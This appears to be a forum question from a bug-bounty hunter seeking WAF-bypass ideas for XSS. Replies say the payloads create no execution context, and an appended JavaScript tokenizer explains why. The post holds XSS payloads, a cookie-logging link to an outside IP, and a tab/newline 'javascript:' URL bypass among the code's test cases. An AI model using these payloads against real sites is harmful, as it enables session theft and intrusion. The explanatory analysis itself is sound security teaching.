
I am doing a bug bounty and I found an XSS injection point. However, most tags are filtered and I have been getting no results executing JS; I can do whatever HTML I want, though.

Here are some examples as they show in WebDev Tools:

<img title="test" maxlength="50" on*load="j<!-- -->A<!-- -->v<!-- -->a<!-- -->Scr<!-- -->ipt:<!-- -->al<!-- -->ert();"> 
<img title="test" maxlength="50" src="j<!-- -->A<!-- -->v<!-- -->a<!-- -->Scr<!-- -->ipt:<!-- -->al<!-- -->ert();"> 

I learned that any JS is filtered and I've been trying many bypass techniques; Unicode is all filtered as well.

I am also able to inject tags and the links work, but when adding things like document.cookie it triggers the WAF.

<a href="http://38.47.239.XXX:5000/log_cookie?cookie=" + document="">XSS</a> 

(Once I put .cookie it triggers the WAF, but I can do documentcookie, if that even helps.)

I'm not sure if my comments are even effective, because they appear when viewing with dev tools...

I am doing a bug bounty and there is a 1.7k bounty on things like executing JS. I am able to mess up the whole style of the page, but that's not really a big deal.

Does anyone have any techniques I am missing for bypassing WAF filters? It took me a long time to find this injection point; there has to be a way to execute JS.

Or maybe there is something entirely different I can do?

All examples are how they show in devtools.

  • You claim to have found an XSS vulnerability, but none of the examples you've shown come close. Some don't even make sense – for example, you can't do string concatenation in the middle of an href attribute, and I have no idea why you're trying to use the javascript: scheme in an onload attribute. It's nice that you can inject HTML markup, but this is very different from XSS. If you cannot even create a JavaScript execution context (like an on attribute or a javascript: URL), then you have not found an XSS vulnerability. – Ja1024, Jan 12 at 23:09
  • I think this is also a pure programming question that might have been a better fit for StackOverflow. – Jan 13 at 0:48
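The point Ja1024's comment makes, shown as an added example that is not part of the original question or comments: a minimal tokenizer for one HTML start tag, modelled on the HTML Standard's "attribute name" and "attribute value" tokenizer states, plus a check for the two execution contexts the comment names (an event-handler attribute, or a javascript: URL in a URL-valued attribute). It runs the three payloads from the question through that parse and reports what a browser would actually see. The event-handler and URL-attribute lists are assumed subsets for illustration, the two control payloads at the end are constructed, and character references are not decoded.

```javascript
// Added example, not code from the original post: a minimal tokenizer for a
// single HTML start tag, following the HTML Standard's "attribute name" and
// "attribute value" tokenizer states closely enough to show what a browser
// makes of the poster's payloads. Character references are not decoded.

// Assumed, illustrative subsets: real browsers support many more of each.
const EVENT_HANDLER_ATTRS = new Set(['onload', 'onerror', 'onclick', 'onmouseover', 'onfocus']);
const URL_ATTRS = new Set(['href', 'src', 'action', 'formaction']);

const isWs = (c) => c === ' ' || c === '\t' || c === '\n' || c === '\f' || c === '\r';

function tokenizeStartTag(html) {
  if (html[0] !== '<') throw new Error('expected a start tag');
  let i = 1;
  let tag = '';
  while (i < html.length && !isWs(html[i]) && html[i] !== '/' && html[i] !== '>') {
    tag += html[i++].toLowerCase();
  }
  const attrs = [];
  for (;;) {
    // "before attribute name" state: skip whitespace and stray '/'
    while (i < html.length && (isWs(html[i]) || html[i] === '/')) i++;
    if (i >= html.length || html[i] === '>') break;

    // "attribute name" state: everything up to whitespace, '/', '>' or '='
    // is the name, lowercased. '*', '<', '!' and '-' are ordinary name characters.
    let name = '';
    while (i < html.length && !isWs(html[i]) && html[i] !== '/' && html[i] !== '>' && html[i] !== '=') {
      name += html[i++].toLowerCase();
    }

    // "after attribute name" state: a value follows only if the next
    // non-whitespace character is '='. Otherwise the attribute has no value
    // and the next token starts a new attribute (this is what '+' becomes below).
    while (i < html.length && isWs(html[i])) i++;
    let value = null;
    if (html[i] === '=') {
      i++;
      while (i < html.length && isWs(html[i])) i++;
      const quote = html[i];
      if (quote === '"' || quote === "'") {
        // quoted value: runs to the matching quote; '<!-- -->' inside is literal text
        const end = html.indexOf(quote, i + 1);
        value = html.slice(i + 1, end === -1 ? html.length : end);
        i = end === -1 ? html.length : end + 1;
      } else {
        // unquoted value: runs to whitespace or '>'
        value = '';
        while (i < html.length && !isWs(html[i]) && html[i] !== '>') value += html[i++];
      }
    }
    attrs.push({ name, value });
  }
  return { tag, attrs };
}

// Mirror of the URL Standard's input preprocessing: strip leading/trailing
// C0 controls and spaces, then remove ASCII tab and newline anywhere.
function preprocessUrl(value) {
  return value.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '').replace(/[\t\n\r]/g, '');
}

// Report the execution contexts a parsed start tag would give the browser:
// an event-handler attribute, or a javascript: URL in a URL-valued attribute.
function findExecutionContexts({ attrs }) {
  const hits = [];
  for (const { name, value } of attrs) {
    if (EVENT_HANDLER_ATTRS.has(name)) hits.push(`event handler ${name}`);
    if (URL_ATTRS.has(name) && value !== null && /^javascript:/i.test(preprocessUrl(value))) {
      hits.push(`javascript: URL in ${name}`);
    }
  }
  return hits;
}

// The poster's payloads, copied from the question, plus two constructed controls.
const SAMPLES = [
  '<img title="test" maxlength="50" on*load="j<!-- -->A<!-- -->v<!-- -->a<!-- -->Scr<!-- -->ipt:<!-- -->al<!-- -->ert();">',
  '<img title="test" maxlength="50" src="j<!-- -->A<!-- -->v<!-- -->a<!-- -->Scr<!-- -->ipt:<!-- -->al<!-- -->ert();">',
  '<a href="http://38.47.239.XXX:5000/log_cookie?cookie=" + document="">XSS</a>',
  '<img src=x onerror="alert(1)">',          // constructed control: a real handler attribute
  '<a href="\tjava\nscript:alert(1)">x</a>', // constructed control: tab/newline vanish in the URL parser
];

for (const html of SAMPLES) {
  const parsed = tokenizeStartTag(html);
  console.log(parsed.tag, parsed.attrs.map((a) => `${a.name}=${JSON.stringify(a.value)}`).join(' '));
  console.log('  execution contexts:', findExecutionContexts(parsed));
}
```

Running it shows why the WAF has nothing to block: `on*load` is just an attribute named `on*load`, the `<!-- -->` sequences stay inside the quoted value as literal text (so the `src` never starts with `javascript:`), and `" + document=""` tokenizes into a plain `href`, a valueless attribute named `+`, and an empty `document` attribute. Only the two constructed controls produce an execution context, which is the bar the comment describes.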
